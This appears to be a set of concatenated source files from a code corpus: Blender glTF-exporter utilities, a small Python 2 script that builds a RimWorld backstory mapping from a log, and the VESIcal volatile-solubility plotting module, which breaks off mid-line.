same_vertex_count = False break key_pos = [0] * 3 * len(verts) verts.foreach_get('co', key_pos) key_positions.append(key_pos) key.value = 0 if same_vertex_count: # basis shape key obj_to.shape_key_add(name=obj_from.data.shape_keys.reference_key.name) vert_co = [0] * 3 * len(obj_to.data.vertices) for i in range(len(key_names)): key_block = obj_to.shape_key_add(name=key_names[i]) key_block.value = key_values[i] key_block.data.foreach_set('co', key_positions[i]) else: # don't create nothing if vertex count isn't constant pass for i in range(len(keys_from)): keys_from[i].value = key_values[i] return same_vertex_count def meshNeedTangentsForExport(mesh, optimize_tangents): """ Check if it's needed to export tangents for the given mesh. """ return (meshHasUvLayers(mesh) and (meshMaterialsUseTangents(mesh) or not optimize_tangents)) def meshHasUvLayers(mesh): return bool(mesh.uv_layers.active and len(mesh.uv_layers) > 0) def meshMaterialsUseTangents(mesh): for mat in mesh.materials: if mat and mat.use_nodes and mat.node_tree != None: node_trees = extractMaterialNodeTrees(mat.node_tree) for node_tree in node_trees: for bl_node in node_tree.nodes: if matNodeUseTangents(bl_node): return True # HACK: in most cases this one indicates that object linking is used # disable tangent optimizations for such cases elif mat == None: return True return False def matNodeUseTangents(bl_node): if isinstance(bl_node, bpy.types.ShaderNodeNormalMap): return True if (isinstance(bl_node, bpy.types.ShaderNodeTangent) and bl_node.direction_type == 'UV_MAP'): return True if isinstance(bl_node, bpy.types.ShaderNodeNewGeometry): for out in bl_node.outputs: if out.identifier == 'Tangent' and out.is_linked: return True return False def extractMaterialNodeTrees(node_tree): """NOTE: located here since it's needed for meshMaterialsUseTangents()""" out = [node_tree] for bl_node in node_tree.nodes: if isinstance(bl_node, bpy.types.ShaderNodeGroup): out += extractMaterialNodeTrees(bl_node.node_tree) return out def meshHasNgons(mesh): for poly in mesh.polygons: if poly.loop_total > 4: return True return False def modifierNeedsExport(mod): """ Modifiers that are applied before export shouldn't be: - hidden during render (a way to disable export of a modifier) - ARMATURE modifiers (used separately via skinning) """ return mod.show_render and mod.type != 'ARMATURE' def getSocketDefvalCompat(socket, RGBAToRGB=False, isOSL=False): """ Get the default value of input/output sockets in some compatible form. Vector types such as bpy_prop_aray, Vector, Euler, etc... are converted to lists, primitive types are converted to int/float. """ if socket.type == 'VALUE' or socket.type == 'INT': return socket.default_value elif socket.type == 'BOOLEAN': return int(socket.default_value) elif socket.type == 'VECTOR': return [i for i in socket.default_value] elif socket.type == 'RGBA': val = [i for i in socket.default_value] if RGBAToRGB: val = val[0:3] return val elif socket.type == 'SHADER': # shader sockets have no default value return [0, 0, 0, 0] elif socket.type == 'STRING' and isOSL: # for now used for OSL only return pyosl.glslgen.string_to_osl_const(socket.default_value) elif socket.type == 'CUSTOM': # not supported return 0 else: return 0 def createCustomProperty(bl_element): """ Filters and creates a custom property, which is stored in the glTF extra field. """ if not bl_element: return None props = {} # Custom properties, which are in most cases present and should not be exported. black_list = ['cycles', 'cycles_visibility', 'cycles_curves', '_RNA_UI', 'v3d'] count = 0 for custom_property in bl_element.keys(): if custom_property in black_list: continue value = bl_element[custom_property] add_value = False if isinstance(value, str): add_value = True if isinstance(value, (int, float)): add_value = True if hasattr(value, "to_list"): value = value.to_list() add_value = True if add_value: props[custom_property] = value count += 1 if count == 0: return None return props def calcLightThresholdDist(bl_light, threshold): """Calculate the light attenuation distance from the given threshold. The light power at this distance equals the threshold value. """ return math.sqrt(max(1e-16, max(bl_light.color.r, bl_light.color.g, bl_light.color.b) * max(1, bl_light.specular_factor) * abs(bl_light.energy / 100) / max(threshold, 1e-16) ))
29.525292
95
0.669412
2,053
15,176
4.806624
0.253288
0.006688
0.008512
0.011552
0.178354
0.116842
0.043575
0.012566
0
0
0
0.010884
0.243213
15,176
513
96
29.582846
0.848324
0.244201
0
0.1777
0
0
0.024144
0.005991
0
0
0
0
0
1
0.121951
false
0.003484
0.017422
0.02439
0.313589
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c67008a5b97aeb98ea7d651117dafc25583098
531
py
Python
scripts/generate_story_map.py
afit/rimworld-save-migrator
a142dcef807e58a471b8bd840e4c4416ced73173
[ "MIT" ]
3
2018-07-02T23:36:52.000Z
2019-01-21T17:16:35.000Z
scripts/generate_story_map.py
afit/rimworld-save-migrator
a142dcef807e58a471b8bd840e4c4416ced73173
[ "MIT" ]
null
null
null
scripts/generate_story_map.py
afit/rimworld-save-migrator
a142dcef807e58a471b8bd840e4c4416ced73173
[ "MIT" ]
null
null
null
#!/usr/bin/python # Look at the story mappings from rimworld.log # cat rimworld.log | grep backstory | sort -u > stories.txt # RimWorld handles the mappings, but pollutes its log when it does so. f = open( 'stories.txt' ) print 'mappings = {' for l in f.readlines(): x = l.strip().split(' ') if 'Giving random' in l: continue elif 'or any close match' in l: print '\t\'%s\': \'VideoGamer91\',' % ( x[6].replace( ',', '' ) ) else: print '\t\'%s\': \'%s\',' % ( x[6], x[11], ) print '}'
24.136364
73
0.563089
77
531
3.883117
0.675325
0.073579
0.046823
0
0
0
0
0
0
0
0
0.014963
0.244821
531
21
74
25.285714
0.730673
0.354049
0
0
0
0
0.20944
0
0
0
0
0
0
0
null
null
0
0
null
null
0.363636
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99c8bc3429d14ce3a02ee120f70154934756c968
37,815
py
Python
VESIcal/vplot.py
kaylai/VESIcal
3ea18b0ce30b30fb55786346c37ef8f428ee5034
[ "MIT" ]
16
2020-06-22T09:07:32.000Z
2022-01-12T13:42:12.000Z
VESIcal/vplot.py
kaylai/VESIcal
3ea18b0ce30b30fb55786346c37ef8f428ee5034
[ "MIT" ]
136
2020-05-22T21:43:23.000Z
2022-03-07T22:06:33.000Z
build/lib/VESIcal/vplot.py
kaylai/VESIcal
3ea18b0ce30b30fb55786346c37ef8f428ee5034
[ "MIT" ]
3
2021-05-18T08:21:02.000Z
2022-03-25T01:08:10.000Z
from VESIcal import core from VESIcal import calibrations from VESIcal.tasplot import add_LeMaitre_fields import pandas as pd import numpy as np import warnings as w import matplotlib as mpl import matplotlib.pyplot as plt # ---------- DEFINE CUSTOM PLOTTING FORMATTING ------------ # style = "seaborn-colorblind" plt.style.use(style) plt.rcParams["mathtext.default"] = "regular" plt.rcParams["mathtext.fontset"] = "dejavusans" mpl.rcParams['patch.linewidth'] = 1 mpl.rcParams['axes.linewidth'] = 1 plt.rcParams['axes.titlesize'] = 20 plt.rcParams['axes.labelsize'] = 18 plt.rcParams['xtick.labelsize'] = 14 plt.rcParams['ytick.labelsize'] = 14 plt.rcParams['legend.fontsize'] = 14 mpl.rcParams['lines.markersize'] = 10 # Define color cycler based on plot style set here # get style formatting set by plt.style.use(): the_rc = plt.style.library[style] # list of colors by hex code: color_list = the_rc['axes.prop_cycle'].by_key()['color'] * 10 color_cyler = the_rc['axes.prop_cycle'] # get the cycler # ----------- MAGMASAT PLOTTING FUNCTIONS ----------- # def smooth_isobars_and_isopleths(isobars=None, isopleths=None): """ Takes in a dataframe with calculated isobar and isopleth information (e.g., output from calculate_isobars_and_isopleths) and smooths the data for plotting. Parameters ---------- isobars: pandas DataFrame OPTIONAL. DataFrame object containing isobar information as calculated by calculate_isobars_and_isopleths. isopleths: pandas DataFrame OPTIONAL. DataFrame object containing isopleth information as calculated by calculate_isobars_and_isopleths. Returns ------- pandas DataFrame DataFrame with x and y values for all isobars and all isopleths. Useful if a user wishes to do custom plotting with isobar and isopleth data rather than using the built-in `plot_isobars_and_isopleths()` function. """ np.seterr(divide='ignore', invalid='ignore') # turn off numpy warning w.filterwarnings("ignore", message="Polyfit may be poorly conditioned") if isobars is not None: P_vals = isobars.Pressure.unique() isobars_lists = isobars.values.tolist() # add zero values to volatiles list isobars_lists.append([0.0, 0.0, 0.0, 0.0]) isobars_pressure = [] isobars_H2O_liq = [] isobars_CO2_liq = [] # do some data smoothing for pressure in P_vals: Pxs = [item[1] for item in isobars_lists if item[0] == pressure] Pys = [item[2] for item in isobars_lists if item[0] == pressure] try: # calcualte polynomial Pz = np.polyfit(Pxs, Pys, 3) Pf = np.poly1d(Pz) # calculate new x's and y's Px_new = np.linspace(Pxs[0], Pxs[-1], 50) Py_new = Pf(Px_new) # Save x's and y's Px_new_list = list(Px_new) isobars_H2O_liq += Px_new_list Py_new_list = list(Py_new) isobars_CO2_liq += Py_new_list pressure_vals_for_list = [pressure]*len(Px_new) isobars_pressure += pressure_vals_for_list except Exception: Px_list = list(Pxs) isobars_H2O_liq += Px_list Py_list = list(Pys) isobars_CO2_liq += Py_list pressure_vals_for_list = [pressure]*len(Pxs) isobars_pressure += pressure_vals_for_list isobar_df = pd.DataFrame({"Pressure": isobars_pressure, "H2O_liq": isobars_H2O_liq, "CO2_liq": isobars_CO2_liq}) if isopleths is not None: XH2O_vals = isopleths.XH2O_fl.unique() isopleths_lists = isopleths.values.tolist() isopleths_XH2O_fl = [] isopleths_H2O_liq = [] isopleths_CO2_liq = [] for Xfl in XH2O_vals: Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl] Xys = [item[2] for item in isopleths_lists if item[0] == Xfl] try: # calculate polynomial Xz = np.polyfit(Xxs, Xys, 2) Xf = np.poly1d(Xz) # calculate new x's and y's Xx_new = np.linspace(Xxs[0], Xxs[-1], 50) Xy_new = Xf(Xx_new) # Save x's and y's Xx_new_list = list(Xx_new) isopleths_H2O_liq += Xx_new_list Xy_new_list = list(Xy_new) isopleths_CO2_liq += Xy_new_list XH2Ofl_vals_for_list = [Xfl]*len(Xx_new) isopleths_XH2O_fl += XH2Ofl_vals_for_list except Exception: Xx_list = list(Xxs) isopleths_H2O_liq += Xx_list Xy_list = list(Xys) isopleths_CO2_liq += Xy_list XH2Ofl_vals_for_list = [Xfl]*len(Xxs) isopleths_XH2O_fl += XH2Ofl_vals_for_list isopleth_df = pd.DataFrame({"XH2O_fl": isopleths_XH2O_fl, "H2O_liq": isopleths_H2O_liq, "CO2_liq": isopleths_CO2_liq}) np.seterr(divide='warn', invalid='warn') # turn numpy warning back on w.filterwarnings("always", message="Polyfit may be poorly conditioned") if isobars is not None: if isopleths is not None: return isobar_df, isopleth_df else: return isobar_df else: if isopleths is not None: return isopleth_df def plot(isobars=None, isopleths=None, degassing_paths=None, custom_H2O=None, custom_CO2=None, isobar_labels=None, isopleth_labels=None, degassing_path_labels=None, custom_labels=None, custom_colors="VESIcal", custom_symbols=None, markersize=10, figsize=(12, 8), save_fig=False, extend_isobars_to_zero=True, smooth_isobars=False, smooth_isopleths=False, **kwargs): """ Custom automatic plotting of model calculations in VESIcal. Isobars, isopleths, and degassing paths can be plotted. Labels can be specified for each. Any combination of isobars, isopleths, and degassing paths can be plotted. Parameters ---------- isobars: pandas DataFrame or list OPTIONAL. DataFrame object containing isobar information as calculated by calculate_isobars_and_isopleths. Or a list of DataFrame objects. isopleths: pandas DataFrame or list OPTIONAL. DataFrame object containing isopleth information as calculated by calculate_isobars_and_isopleths. Or a list of DataFrame objects. degassing_paths: list OPTIONAL. List of DataFrames with degassing information as generated by calculate_degassing_path(). custom_H2O: list OPTIONAL. List of groups of H2O values to plot as points. For example myfile.data['H2O'] is one group of H2O values. Must be passed with custom_CO2 and must be same length as custom_CO2. custom_CO2: list OPTIONAL. List of groups of CO2 values to plot as points.For example myfile.data['CO2'] is one group of CO2 values. Must be passed with custom_H2O and must be same length as custom_H2O. isobar_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each plotted line will be given the generic legend name of "Isobars n", with n referring to the nth isobars passed. Isobar pressure is given in parentheses. The user can pass their own labels as a list of strings. If more than one set of isobars is passed, the labels should refer to each set of isobars, not each pressure. isopleth_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each plotted isopleth will be given the generic legend name of "Isopleth n", with n referring to the nth isopleths passed. Isopleth XH2O values are given in parentheses. The user can pass their own labels as a list of strings. If more than one set of isopleths is passed, the labels should refer to each set of isopleths, not each XH2O value. degassing_path_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each plotted line will be given the generic legend name of "Pathn", with n referring to the nth degassing path passed. The user can pass their own labels as a list of strings. custom_labels: list OPTIONAL. Labels for the plot legend. Default is None, in which case each group of custom points will be given the generic legend name of "Customn", with n referring to the nth degassing path passed. The user can pass their own labels as a list of strings. custom_colors: list OPTIONAL. Default value is "VESIcal", which uses VESIcal's color ramp. A list of color values readable by matplotlib can be passed here if custom symbol colors are desired. The length of this list must match that of custom_H2O and custom_CO2. custom_symbols: list OPTIONAL. Default value is None, in which case data are plotted as filled circles.. A list of symbol tyles readable by matplotlib can be passed here if custom symbol types are desired. The length of this list must match that of custom_H2O and custom_CO2. markersize: int OPTIONAL. Default value is 10. Same as markersize kwarg in matplotlib. Any numeric value passed here will set the marker size for (custom_H2O, custom_CO2) points. figsize: tuple OPTIONAL. Default value is (12,8). Sets the matplotlib.pyplot figsize value as (x_dimension, y_dimension) save_fig: False or str OPTIONAL. Default value is False, in which case the figure will not be saved. If a string is passed, the figure will be saved with the string as the filename. The string must include the file extension. extend_isobars_to_zero: bool OPTIONAL. If True (default), isobars will be extended to zero, even if there is a finite solubility at zero partial pressure. smooth_isobars: bool OPTIONAL. Default is False. If set to True, isobar data will be fit to a polynomial and plotted. If False, the raw input data will be plotted. smooth_isopleths: bool OPTIONAL. Default is False. If set to True, isopleth data will be fit to a polynomial and plotted. If False, the raw input data will be plotted. Returns ------- fig, axes Matplotlib objects fig and axes matploblib objects defining a plot with x-axis as H2O wt% in the melt and y-axis as CO2 wt%in the melt. Isobars, or lines of constant pressure at which the sample magma composition is saturated, and isopleths, or lines of constant fluid composition at which the sample magma composition is saturated, are plotted if passed. Degassing paths, or the concentration of dissolved H2O and CO2 in a melt equilibrated along a path of decreasing pressure, is plotted if passed. """ # Turn off warnings: np.seterr(divide='ignore', invalid='ignore') # turn off numpy warning w.filterwarnings("ignore", message="Polyfit may be poorly conditioned") def check_inputs(custom_H2O, custom_CO2): if custom_H2O is not None: if custom_CO2 is None: raise core.InputError("If x data is passed, y data must also " "be passed.") else: if len(custom_H2O) == len(custom_CO2): pass else: raise core.InputError("x and y data must be same length") if custom_CO2 is not None: if custom_H2O is None: raise core.InputError("If y data is passed, x data must also " "be passed.") def check_colors(custom_colors): if custom_colors == "VESIcal": use_colors = color_list elif isinstance(custom_colors, list): use_colors = custom_colors else: raise core.InputError("Argument custom_colors must be type list. " "Just passing one item? Try putting square " "brackets, [], around it.") return use_colors def calc_extend_isobars_to_zero(Pxs, Pys): """ Calculates new end-points for plotting isobars when extend_isobars_to_zero option is set to True. Parameters ---------- Pxs, Pys: list List of x and y values corresponding to isobars. """ if Pxs[0]*Pys[0] != 0.0: if Pxs[0] > Pys[0]: # create new array of length n+1 if n is the length of the # original array: Px_new = np.zeros(np.shape(Pxs)[0]+1) # set the first x value in the new array equal to 0: Px_new[0] = 0 # fill the rest of the new array with the original array # values: Px_new[1:] = Pxs # overwrite the original array with the new one: Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[0] = Pys[0] Py_new[1:] = Pys Pys = Py_new else: Px_new = np.zeros(np.shape(Pxs)[0]+1) Px_new[0] = Pxs[0] Px_new[1:] = Pxs Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[0] = 0 Py_new[1:] = Pys Pys = Py_new if Pxs[-1]*Pys[-1] != 0.0: if Pxs[-1] < Pys[-1]: Px_new = np.zeros(np.shape(Pxs)[0]+1) Px_new[-1] = 0 Px_new[:-1] = Pxs Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[-1] = Pys[-1] Py_new[:-1] = Pys Pys = Py_new else: Px_new = np.zeros(np.shape(Pxs)[0]+1) Px_new[-1] = Pxs[-1] Px_new[:-1] = Pxs Pxs = Px_new Py_new = np.zeros(np.shape(Pys)[0]+1) Py_new[-1] = 0 Py_new[:-1] = Pys Pys = Py_new return Pxs, Pys # -------- HANDLE USER INPUT ERRORS, SET COLORS, SMOOTH LINES -------- ## check_inputs(custom_H2O=custom_H2O, custom_CO2=custom_CO2) use_colors = check_colors(custom_colors=custom_colors) if smooth_isobars: isobars = smooth_isobars_and_isopleths(isobars=isobars) if smooth_isopleths: isopleths = smooth_isobars_and_isopleths(isopleths=isopleths) # -------- CREATE FIGURE -------- ## fig, ax = plt.subplots(figsize=figsize) if 'custom_x' in kwargs: ax.set(xlabel=kwargs['xlabel'], ylabel=kwargs['ylabel']) else: ax.set(xlabel='H$_2$O wt%', ylabel='CO$_2$ wt%') labels = [] # -------- PLOT ISOBARS -------- ## if isobars is not None: if isinstance(isobars, pd.DataFrame): isobars = [isobars] for i in range(len(isobars)): P_vals = isobars[i].Pressure.unique() isobars_lists = isobars[i].values.tolist() # add zero values to volatiles list isobars_lists.append([0.0, 0.0, 0.0, 0.0]) P_iter = 0 for pressure in P_vals: P_iter += 1 Pxs = [item[1] for item in isobars_lists if item[0] == pressure] Pys = [item[2] for item in isobars_lists if item[0] == pressure] if extend_isobars_to_zero: try: Pxs, Pys = calc_extend_isobars_to_zero(Pxs, Pys) except Exception: pass else: print(extend_isobars_to_zero) if len(isobars) > 1: if P_iter == 1: P_list = [int(i) for i in P_vals] if isinstance(isobar_labels, list): labels.append(str(isobar_labels[i]) + ' (' + ', '.join(map(str, P_list)) + " bars)") else: labels.append('Isobars ' + str(i+1) + ' (' + ', '.join(map(str, P_list)) + " bars)") else: labels.append('_nolegend_') if len(isobars) > 1: ax.plot(Pxs, Pys, color=color_list[i]) else: ax.plot(Pxs, Pys) if len(isobars) == 1: labels += [str(P_val) + " bars" for P_val in P_vals] # -------- PLOT ISOPLETHS -------- ## if isopleths is not None: if isinstance(isopleths, pd.DataFrame): isopleths = [isopleths] for i in range(len(isopleths)): XH2O_vals = isopleths[i].XH2O_fl.unique() isopleths_lists = isopleths[i].values.tolist() H_iter = 0 for Xfl in XH2O_vals: H_iter += 1 Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl] Xys = [item[2] for item in isopleths_lists if item[0] == Xfl] if len(isopleths) > 1: if H_iter == 1: H_list = [i for i in XH2O_vals] if isinstance(isopleth_labels, list): labels.append(str(isopleth_labels[i]) + ' (' + ', '.join(map(str, H_list)) + " XH2Ofluid)") else: labels.append('Isopleths ' + str(i+1) + ' (' + ', '.join(map(str, H_list)) + " XH2Ofluid)") else: labels.append('_nolegend_') ax.plot(Xxs, Xys, ls='dashed', color=color_list[i]) if len(isopleths) == 1: H_list = [i for i in XH2O_vals] if H_iter == 1: labels.append('Isopleths (' + ', '.join(map(str, H_list)) + " XH2Ofluid)") else: labels.append('_nolegend_') ax.plot(Xxs, Xys, ls='dashed', color='k') # -------- PLOT DEGASSING PATHS -------- ## if degassing_paths is not None: if isinstance(degassing_paths, pd.DataFrame): degassing_paths = [degassing_paths] degassing_colors = color_list.copy() iterno = 0 for i in range(len(degassing_paths)): if degassing_path_labels is None: iterno += 1 labels.append('Path%s' % iterno) ax.plot(degassing_paths[i]["H2O_liq"], degassing_paths[i]["CO2_liq"], ls='dotted', color=degassing_colors[i]) else: labels.append(degassing_path_labels[iterno]) ax.plot(degassing_paths[i]["H2O_liq"], degassing_paths[i]["CO2_liq"], ls='dotted', color=degassing_colors[i]) iterno += 1 for i in range(len(degassing_paths)): ax.plot(degassing_paths[i]["H2O_liq"].max(), degassing_paths[i]["CO2_liq"].max(), 'o', color=degassing_colors[i]) labels.append('_nolegend_') # -------- PLOT CUSTOM H2O-CO2 -------- ## if custom_H2O is not None and custom_CO2 is not None: if isinstance(custom_H2O, pd.DataFrame): custom_H2O = [custom_H2O] if isinstance(custom_CO2, pd.DataFrame): custom_CO2 = [custom_CO2] if custom_symbols is None: use_marker = ['o'] * len(custom_H2O) else: use_marker = custom_symbols iterno = 0 for i in range(len(custom_H2O)): if custom_labels is None: iterno += 1 labels.append('Custom%s' % iterno) ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i], color=use_colors[i], markersize=markersize) else: labels.append(custom_labels[iterno]) ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i], color=use_colors[i], markersize=markersize) iterno += 1 # -------- PLOT CUSTOM X-Y -------- ## if 'custom_x' in kwargs: custom_x = kwargs['custom_x'] custom_y = kwargs['custom_y'] if isinstance(custom_x, pd.core.series.Series): custom_x = [list(custom_x.values)] if isinstance(custom_y, pd.core.series.Series): custom_y = [list(custom_y.values)] if custom_symbols is None: use_marker = ['o'] * len(custom_x) else: use_marker = custom_symbols iterno = 0 for i in range(len(custom_x)): if custom_labels is None: iterno += 1 labels.append('Custom%s' % iterno) ax.plot(custom_x[i], custom_y[i], use_marker[i], color=use_colors[i], markersize=markersize) else: labels.append(custom_labels[iterno]) ax.plot(custom_x[i], custom_y[i], use_marker[i], color=use_colors[i], markersize=markersize) iterno += 1 # -------- PLOT LEGEND -------- ## ax.legend(labels, bbox_to_anchor=(1.01, 1), loc='upper left') if 'custom_x' not in kwargs: ax.set_xlim(left=0) ax.set_ylim(bottom=0) np.seterr(divide='warn', invalid='warn') # turn numpy warning back on w.filterwarnings("always", message="Polyfit may be poorly conditioned") # -------- SAVE FIGURE IF DESIRED -------- ## if save_fig is not False: fig.savefig(save_fig) return fig, ax def scatterplot(custom_x, custom_y, xlabel=None, ylabel=None, **kwargs): """ Custom x-y plotting using VESIcal's built-in plot() function, built Matplotlib's plot and scatter functions. Parameters ---------- custom_x: list List of groups of x-values to plot as points or lines custom_y: list List of groups of y-values to plot as points or lines xlabel: str OPTIONAL. What to display along the x-axis. ylabel: str OPTIONAL. What to display along the y-axis. kwargs: Can take in any key word agruments that can be passed to `plot()`. Returns ------- fig, ax matplotlib objects X-y plot with custom x and y axis values and labels. """ if isinstance(custom_x, list) and isinstance(custom_y, list): if len(custom_x) != len(custom_y): raise core.InputError("X and y lists must be same length") if xlabel is not None: if isinstance(xlabel, str): pass else: raise core.InputError("xlabel must be string") if ylabel is not None: if isinstance(ylabel, str): pass else: raise core.InputError("ylabel must be string") return plot(custom_x=custom_x, custom_y=custom_y, xlabel=xlabel, ylabel=ylabel, **kwargs) # ------- Define custom plotting tools for checking calibrations ------- # def calib_plot(user_data=None, model='all', plot_type='TAS', zoom=None, figsize=(17, 8), legend=True, save_fig=False, **kwargs): """ Plots user data and calibration set of any or all models on any x-y plot or a total alkalis vs silica (TAS) diagram. TAS diagram boundaries provided by tasplot python module, copyright John A Stevenson. Parameters ---------- user_data: BatchFile object, Sample object, pandas DataFrame, pandas Series, or dict. OPTIONAL. Default value is None, in which case only the model calibration set is plotted. User provided sample data describing the oxide composition of one or more samples. Multiple samples can be passed as an BatchFile object or pandas DataFrame. A single sample can be passed as a pandas Series. model: str or list OPTIONAL. Default value is 'all', in which case all model calibration datasets will be plotted. 'Mixed' can be used to plot all mixed fluid models. String of the name of the model calibration dataset to plot (e.g., 'Shishkina'). Multiple models can be plotted by passing them as strings within a list (e.g., ['Shishkina', 'Dixon']). plot_type: str OPTIONAL. Default value is 'TAS', which returns a total alkali vs silica (TAS) diagram. Any two oxides can be plotted as an x-y plot by setting plot_type='xy' and specifying x- and y-axis oxides, e.g., x='SiO2', y='Al2O3'. zoom: str or list OPTIONAL. Default value is None in which case axes will be set to the default of 35<x<100 wt% and 0<y<25 wt% for TAS type plots and the best values to show the data for xy type plots. Can pass "user_data" to plot the figure where the x and y axes are scaled down to zoom in and only show the region surrounding the user_data. A list of tuples may be passed to manually specify x and y limits. Pass in data as [(x_min, x_max), (y_min, y_max)]. For example, the default limits here would be passed in as [(35,100), (0,25)]. figsize: tuple OPTIONAL. Default value is (17,8). Sets the matplotlib.pyplot figsize value as (x_dimension, y_dimension). legend: bool OPTIONAL. Default value is True. Can be set to False in which case the legend will not be displayed. save_fig: False or str OPTIONAL. Default value is False, in which case the figure will not be saved. If a string is passed, the figure will be saved with the string as the filename. The string must include the file extension. Returns ------- matplotlib object """ # Get x and y axis limits, if user passed them if zoom is None: user_xmin = 35 user_xmax = 100 user_ymin = 0 user_ymax = 25 elif zoom == 'user_data': if isinstance(user_data, pd.DataFrame): print("'user_data' type zoom for more than one sample is not ", "implemented yet.") user_xmin = 35 user_xmax = 100 user_ymin = 0 user_ymax = 25 elif (isinstance(user_data, pd.core.series.Series) or isinstance(user_data, dict)): user_xmin = user_data['SiO2'] - 5 user_xmax = user_data['SiO2'] + 5 user_ymin = user_data['Na2O'] + user_data['K2O'] - 2 if user_ymin < 0: user_ymin = 0 user_ymax = user_data['Na2O'] + user_data['K2O'] + 2 elif isinstance(zoom, list): user_xmin, user_xmax = zoom[0] user_ymin, user_ymax = zoom[1] else: raise core.InputError('Trying to pass zoom coords? Pass as ' + '[(x, x), (y, y)]') # Create the figure fig, ax1 = plt.subplots(figsize=figsize) font = {'family': 'sans-serif', 'color': 'black', 'weight': 'normal', 'size': 20, } # TAS figure if plot_type == 'TAS': # adjust x limits here if you want to focus on a specific part of # compostional space: ax1.set_xlim([user_xmin, user_xmax]) # adjust y limits here ax1.set_ylim([user_ymin, user_ymax]) plt.xlabel('SiO$_2$, wt%', fontdict=font, labelpad=15) plt.ylabel('Na$_2$O+K$_2$O, wt%', fontdict=font, labelpad=15) # add LeMaitre fields if zoom is None: add_LeMaitre_fields(ax1) elif plot_type == 'xy': if 'x' in kwargs and 'y' in kwargs: x = kwargs['x'] y = kwargs['y'] if zoom is not None: ax1.set_xlim([user_xmin, user_xmax]) ax1.set_ylim([user_ymin, user_ymax]) plt.xlabel(str(x)+", wt%", fontdict=font, labelpad=15) plt.ylabel(str(y)+", wt%", fontdict=font, labelpad=15) else: raise core.InputError("If plot_type is 'xy', then x and y " "values must be passed as strings. For " "example, x='SiO2', y='Al2O3'.") # Plot Calibration Data if model == 'all': model = ['MagmaSat', 'Shishkina', 'Dixon', 'IaconoMarziano', 'Liu', 'AllisonCarbon', 'MooreWater'] if model == 'mixed': model = ['MagmaSat', 'Shishkina', 'Dixon', 'IaconoMarziano', 'Liu'] if isinstance(model, str): model = [model] if isinstance(model, list): # set legends to false h2o_legend = False co2_h2oco2_legend = False # check which legends to turn to True for modelname in model: model_type = calibrations.return_calibration_type(modelname) if model_type['H2O']: h2o_legend = True if model_type['CO2'] or model_type['Mixed']: co2_h2oco2_legend = True if h2o_legend: plt.scatter([], [], marker='', label=r"$\bf{Pure \ H_2O:}$") for modelname in model: calibdata = calibrations.return_calibration(modelname) model_type = calibrations.return_calibration_type(modelname) if isinstance(calibdata, str): w.warn(calibdata) else: if model_type['H2O']: if plot_type == 'TAS': try: plt.scatter(calibdata['H2O']['SiO2'], (calibdata['H2O']['Na2O'] + calibdata['H2O']['K2O']), marker='s', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: plt.scatter(calibdata['H2O']['SiO2'], calibdata['H2O']['Na2O+K2O'], marker='s', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) if plot_type == 'xy': try: plt.scatter(calibdata['H2O'][x], calibdata['H2O'][y], marker='s', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: w.warn("The requested oxides were not found", "in the calibration dataset for " + str(modelname) + ".") if co2_h2oco2_legend: plt.scatter([], [], marker='', label=r"${\ }$") if co2_h2oco2_legend: plt.scatter([], [], marker='', label=r"$\bf{\ CO_2 \ and \ H_2O\!-\!CO_2:}$") for modelname in model: calibdata = calibrations.return_calibration(modelname) model_type = calibrations.return_calibration_type(modelname) if isinstance(calibdata, str): w.warn(calibdata) else: if model_type['CO2'] and model_type['Mixed']: frames = [calibdata['CO2'], calibdata['Mixed']] co2_and_mixed = pd.concat(frames) if plot_type == 'TAS': try: plt.scatter(co2_and_mixed['SiO2'], (co2_and_mixed['Na2O'] + co2_and_mixed['K2O']), marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: plt.scatter(co2_and_mixed['SiO2'], co2_and_mixed['Na2O+K2O'], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) if plot_type == 'xy': try: plt.scatter(co2_and_mixed[x], co2_and_mixed[y], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: w.warn("The requested oxides were not found in ", "the calibration dataset for " + str(modelname) + ".") elif model_type['CO2'] or model_type['Mixed']: if model_type['CO2']: thistype = 'CO2' if model_type['Mixed']: thistype = 'Mixed' if plot_type == 'TAS': try: plt.scatter(calibdata[thistype]['SiO2'], (calibdata[thistype]['Na2O'] + calibdata[thistype]['K2O']), marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: plt.scatter(calibdata[thistype]['SiO2'], calibdata[thistype]['Na2O+K2O'], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) if plot_type == 'xy': try: plt.scatter(calibdata[thistype][x], calibdata[thistype][y], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: w.warn("The requested oxides were not found in ", "the calibration dataset for " + str(modelname) + ".") else: raise core.InputError("model must be of type str or list") # Plot user data if user_data is None: pass else: if ((user_data.__class__.__module__, user_data.__class__.__name__) == ('VESIcal', 'BatchFile')): user_data = user_data.get_data() # batchfile and VESIcal (__init__) are not imported to avoid # circular imports # use above notation to interrogate datatype if ((user_data.__class__.__module__, user_data.__class__.__name__) == ('VESIcal', 'Sample')): user_data = user_data.get_composition() # batchfile and VESIcal (__init__) are not imported to avoid # circular imports # use above notation to interrogate datatype if plot_type == 'TAS': _sample = user_data.copy() try: _sample["TotalAlkalis"] = _sample["Na2O"] + _sample["K2O"] except Exception: core.InputError("Na2O and K2O data must be in user_data") plt.scatter(_sample['SiO2'], 